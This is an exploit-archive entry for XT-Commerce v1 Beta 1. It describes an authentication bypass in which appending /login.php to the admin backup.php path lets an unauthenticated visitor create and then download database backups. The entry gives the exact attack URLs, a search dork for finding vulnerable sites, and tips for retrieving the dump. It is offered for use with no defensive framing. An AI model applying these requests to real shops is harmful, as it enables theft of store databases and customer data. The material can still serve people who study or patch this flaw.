XT-Commerce v1 Beta 1 => by Pass / Creat + Download Backup Vuln

2010-04-29T00:00:00
ID 1337DAY-ID-12056
Type zdt
Reporter indoushka
Modified 2010-04-29T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==========================================================================
XT-Commerce v1 Beta 1 => by Pass / Creat and Download Backup Vulnerability
==========================================================================

========================================================================================                 
| # Title    : XT-Commerce v1 Beta 1 => by Pass / Creat and Download Backup Vulnerability  
| # Author   : indoushka                                                              
| # email    : [email protected]                                                                                                                                                                   
| # Dork     : Powered by XT-Commerce                                                                                                              
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0)       
| # Bug      : Backup                                                                    
======================      Exploit By indoushka       =================================
# Exploit  : 
 
http://127.0.0.1/XT-Commerce/admin/backup.php/login.php?action=backupnow
 
to download buckup :http://127.0.0.1/XT-Commerce/admin/backup.php/login.php?action=download&file=db_comm-20100301222138.sql
 
db_comm-20100301222138.sql chang it to the name of the backup and you cant download it with IE i download it with opera 10.10 + Mozilla Firefox



#  0day.today [2018-01-04]  #